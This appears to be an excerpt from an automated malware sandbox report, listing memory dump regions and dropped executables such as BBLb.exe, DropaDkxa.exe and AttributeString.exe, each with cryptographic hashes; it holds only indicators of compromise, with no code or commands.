SHA512 0d6671b7b40b45f7ee770f0e7f5123b3a9e900ad07c2cfe6a88d4651f0c3ec82cd870a345a87b121a67290cb3fcd626cc262115c127ca2aee724dcf2f0e00d8e

memory/2336-986-0x0000000005670000-0x000000000579A000-memory.dmp

memory/2336-983-0x0000000005540000-0x0000000005668000-memory.dmp

memory/2336-982-0x0000000073280000-0x0000000073A30000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

MD5 d66266bdd66df1367606c4c1e3af4491
SHA1 5ce8e64b2f43ea108282d145dae51f8f0368474d
SHA256 ec42eb54b3f3b0d1f86bde3a25b5f7a50caf6219fd2752dc64a6d0cd5043fcd8
SHA512 4542f75de2b86fd00736bef4f072484f325f448e1c2b86c8e128dff188b232f30feb44d8c1d610bbec72a9ff6faef43c722dd9f7be56feb77331e4348b62406e

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

MD5 9c0962bbea048e2a9de1271b1191745e
SHA1 e3993833b14f3c984078966849460b85aa2593b0
SHA256 a5e7c49bc2a14562a593bb087ed09f8d9837e889ad2968189cb781a81143cc6f
SHA512 e15775ebc62cc0a347cf1799db35cfa9736c6d5ad29b05847b4d5d5dbbf0fdc5799f9a756347114b437d4ddf0c29f05433ac5197b8b2e6803816d7a6d33feeed

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

MD5 f79239265890f8607aef219a912a8215
SHA1 0f38eaee2654f9b666c434081cb2809f4995f4bb
SHA256 32dc338385f8108aa1c2bc20af93d576f66734f989654d480cc161bb100c7bb3
SHA512 7f7a5d11b86bd8b79237bb3bbc0261c06ff0a4a70c60276fc3f05153cd299d61976a6f90694d26521ad8d10f01fcf11c4e3780ea914195774a01ebcf4f5e89a0

memory/3204-1291-0x0000000003B00000-0x0000000003F00000-memory.dmp

memory/3204-1295-0x0000000003B00000-0x0000000003F00000-memory.dmp

memory/4588-1310-0x0000000002640000-0x0000000002A40000-memory.dmp

memory/3784-1307-0x0000000000400000-0x000000000040A000-memory.dmp

memory/4588-1338-0x0000000002640000-0x0000000002A40000-memory.dmp

memory/3204-1349-0x0000000003B00000-0x0000000003F00000-memory.dmp

memory/2336-1943-0x0000000005520000-0x0000000005521000-memory.dmp

memory/2336-1944-0x0000000005A00000-0x0000000005AC0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

MD5 2b22cd365b89d60afc8d982af0445b0b
SHA1 460ed7bbffc79263ae170c0c8dde04ea0baf351e
SHA256 2eec3d71d5b8c8d8631c2c344c7d1707b5a56774a2789cb3b2da02e2b586bed7
SHA512 868818de4847bf4fa3f25179341cdfbcb8db5690d95218f9c3d1c92aedb9d40658512ec183be099982f7f4059ada6282298f637cadf7ea1ef8e71d239b0dda52

memory/644-1955-0x0000000073280000-0x0000000073A30000-memory.dmp

memory/644-1957-0x00000000059C0000-0x0000000005AA8000-memory.dmp

memory/644-1956-0x00000000059B0000-0x00000000059C0000-memory.dmp

memory/2336-1954-0x0000000073280000-0x0000000073A30000-memory.dmp

memory/644-1953-0x0000000000400000-0x000000000049C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BBLb.exe.log

MD5 4a911455784f74e368a4c2c7876d76f4
SHA1 a1700a0849ffb4f26671eb76da2489946b821c34
SHA256 264098e15b5b33d425f3b76e45b7976b58f917048125041135f7e60d8151108c
SHA512 4617591400409e1930195795a55e20d5f063042bb3e9fd1955099066e507b6ac8a1e3ae54cc42418e2639149b31bf7e58cd5743670d9030a15e29f14d813815d

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

MD5 0c691ee35d3adb7684153fb87c5cafaa
SHA1 3afb667e74115883949ff75ebc1e04f7160181da
SHA256 9ec9dc363b99c762a3097d880d5c017a8eaacfe4d82de757f4c73302d00d4b27
SHA512 f8c469e372fbe90415cfd5f0d5531c1d986d2209d480dcda11a40d6fb68edf851ee281c8a1d7d91697a3b443f450cf0ebaab00f36d1dd933232016bb40834eb5

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

MD5 8235de2bd44b82d8c453c0dc6fc1e9ac
SHA1 99879f32250c63e410f7c0cae1745c6548bacb6d
SHA256 faec7fc8a3850e655ff9d124a8dbd3988b68b366ab3868cd5f754cd872d6e4f8
SHA512 46dda443890d43c5af81f098d743a758e1c8e46e02cea5f8c767e03e26a0d0fac9e7eacf1b90614a83488f9fbac6cfac750001ff170f9fecff4a351da0a6fd3e

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

MD5 4ff4d072e58faa4beb48e1b68f9caaa4
SHA1 17ecd265ce7fe2fe700f4e3ea9dcb0523e6544fa
SHA256 46952fa52b2c831d4e979cc6e768fbf7854de3e54f8242b3ff9e4a61bb28a20f
SHA512 ba18c19af1fd0e91f109da33e2ee16f3b95dfed1a5a8e1f72162b1f31b79b36acaac25d7e44971dbd55186c0509dbc71c038a6999b5880b0d40672370e4944ef

C:\Users\Admin\AppData\Local\Temp\BBLb.exe

MD5 96ba4df46757c6a1bd023a04b52f0ef3
SHA1 8ba9cd04ede4d58b17f2a95ba08d46a38ad260ba
SHA256 24093264da626aee681a5a77940b0e245f97922e15e894cff35a896fd59b2d9d
SHA512 135a4c156ca38f20b238a5e1c826b2c9c3a74fc0196b503d6f2f8bce4e8bad03d3b816c7e7e6b04815f0438a223f8f640345a4a02515a482329984ddfa389518

memory/644-4159-0x0000000005AB0000-0x0000000005B06000-memory.dmp

memory/644-4160-0x0000000005D00000-0x0000000005D66000-memory.dmp

memory/644-4161-0x0000000006120000-0x0000000006174000-memory.dmp

memory/644-4163-0x0000000073280000-0x0000000073A30000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hkwltzdz.jfi.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3196-4176-0x000001CBB1140000-0x000001CBB1150000-memory.dmp

memory/3196-4175-0x000001CBB1140000-0x000001CBB1150000-memory.dmp

memory/3196-4174-0x00007FFCA02A0000-0x00007FFCA0D61000-memory.dmp

memory/3196-4179-0x00007FFCA02A0000-0x00007FFCA0D61000-memory.dmp

memory/3196-4173-0x000001CBCB800000-0x000001CBCB822000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

MD5 1a917a85dcbb1d3df5f4dd02e3a62873
SHA1 567f528fec8e7a4787f8c253446d8f1b620dc9d6
SHA256 217fbf967c95d1359314fcd53ae8d04489eb3c7bdc1f22110d5a8a476d1fc92e
SHA512 341acbd43efac1718c7f3e3795549acf29237a2675bdadcb7e52ce18aac6dcc6ae628e1b6edfa2338ed6d9923c148cb4322c75fad86d5c0e6f2327c2270563ec

memory/2888-4196-0x0000000073280000-0x0000000073A30000-memory.dmp

memory/2888-5130-0x0000000005240000-0x0000000005250000-memory.dmp

memory/2888-5131-0x00000000051F0000-0x00000000051F1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

MD5 cb5cd0d9238b1f2bc72238039d35896c
SHA1 b700917a6ff05a5209e72363c0e3379a698d5b79
SHA256 7f2bf75ee96eb6274bccb57730e7aaa8f3fee6cabb82c177a2bdf632402b7de6
SHA512 727d16781c51adc33ef05f628b702e3c4e0eee2b2f3b622d0a7c62f92a9d5080db9c40f98766d3aacd53012af04015e513c9c9573b73bb1487ad173a65c3d813

memory/2888-5139-0x0000000073280000-0x0000000073A30000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

MD5 4333389969ba377ea0f16257d84a0e73
SHA1 18177d88d34be43bb924bdedde7d64d720f4c807
SHA256 5170f83f07cc1bc8a3a70742c0094506662ab5885dde11ad443a9d536667d567
SHA512 8b97aeb453b12eb944ccf0f2940bde20b50913cf48ca152a65c646f55a5a9d5368ff0fd0bd4bb74bf6e2d2edeae4e348cb75049b85a871f81b16758095cb032d

C:\Users\Admin\AppData\Local\Temp\DropaDkxa.exe

MD5 3cb95105c6a166aefa82f2903580088a
SHA1 d2fe8a56874248a903a7a11e20ba30ab299e573c
SHA256 06c4b161fcceb223fa477f2e8c38b3905d347ce10d6b7d8aa674fc8c15df5475
SHA512 23e4bd4f260538f84a0b5c8893ed2920edaf7d91a55444ac210f9673e5217f377d8cca1ddd9c9691ade75a05befaaa6956ff2deaa392a03db0d1d5970fa6b5e2

C:\Users\Admin\AppData\Local\TypeId\eozwg\AttributeString.exe

MD5 71eb1bc6e6da380c1cb552d78b391b2a
SHA1 df3278e6e26d8c0bc878fe0a8c8a91b28c5a652d
SHA256 cefa92ee6cc2fad86c49dd37d57ff8afcb9b9abef0a110689e6d771394256bd6
SHA512 d6fab2c469924b8202f7964e864f66d6b6151937c8d134fb40e1f1d3787cf22328892c3f7209786e0b42e1abd5ca71a61f40538ef1e93534d2a98bf6d4448e90

C:\Users\Admin\AppData\Local\TypeId\eozwg\AttributeString.exe

MD5 9b7cb2211782921b151970f3a8fa65b4
SHA1 c467cde438253f34bf43f1d3f5eff8905dd0a4fe
SHA256 628e02a4973fb578ea9535680b0aed328a6e83b0ec4f9cbf73400249266bb974
SHA512 56bde9c7e2aa7a1642c61a723d00114b11ec9a710c709d7f25aee03ebb8396f12316db2f88174fc6c70e391d2559f718b59c8173634859604b93f7ca6f15864d

memory/3612-5143-0x00000000053E0000-0x00000000053F0000-memory.dmp

memory/3612-5142-0x0000000073280000-0x0000000073A30000-memory.dmp

memory/3808-5371-0x0000000003850000-0x0000000003C50000-memory.dmp

memory/3808-5381-0x0000000003850000-0x0000000003C50000-memory.dmp

memory/4900-5388-0x0000000002230000-0x0000000002630000-memory.dmp

memory/4900-5391-0x0000000002230000-0x0000000002630000-memory.dmp

memory/4900-5397-0x0000000002230000-0x0000000002630000-memory.dmp

memory/3808-5396-0x0000000003850000-0x0000000003C50000-memory.dmp

memory/3612-6093-0x0000000005590000-0x0000000005591000-memory.dmp

memory/3612-6100-0x0000000073280000-0x0000000073A30000-memory.dmp

memory/624-6099-0x00000000055D0000-0x00000000055E0000-memory.dmp

memory/624-6098-0x0000000073280000-0x0000000073A30000-memory.dmp

C:\Users\Admin\AppData\Local\TypeId\eozwg\AttributeString.exe

MD5 ae84ef27afc1add4de241467dd7c8fa9
SHA1 91187a90f0c9fdc59c325fedcf829bf72414ef37
SHA256 cd3dea6a694a94800d902f7daf2bac75d7a004f497716943fd0d262bdad28497
SHA512 09d5f1a9b417fa6ce9237a04d954e735ed0a319af01a56589de45a71be3548e17e3884c0d7bd0ce4372be62a4d34e4abbd4c2b2a45eb6c216995033ab207edd8

memory/2944-8303-0x0000000073280000-0x0000000073A30000-memory.dmp

memory/624-8305-0x0000000073280000-0x0000000073A30000-memory.dmp

memory/2944-8304-0x0000000005490000-0x00000000054A0000-memory.dmp

memory/2944-9238-0x0000000002D70000-0x0000000002D71000-memory.dmp

memory/1256-9242-0x0000000073280000-0x0000000073A30000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 77d622bb1a5b250869a3238b9bc1402b
SHA1 d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256 f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512 d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9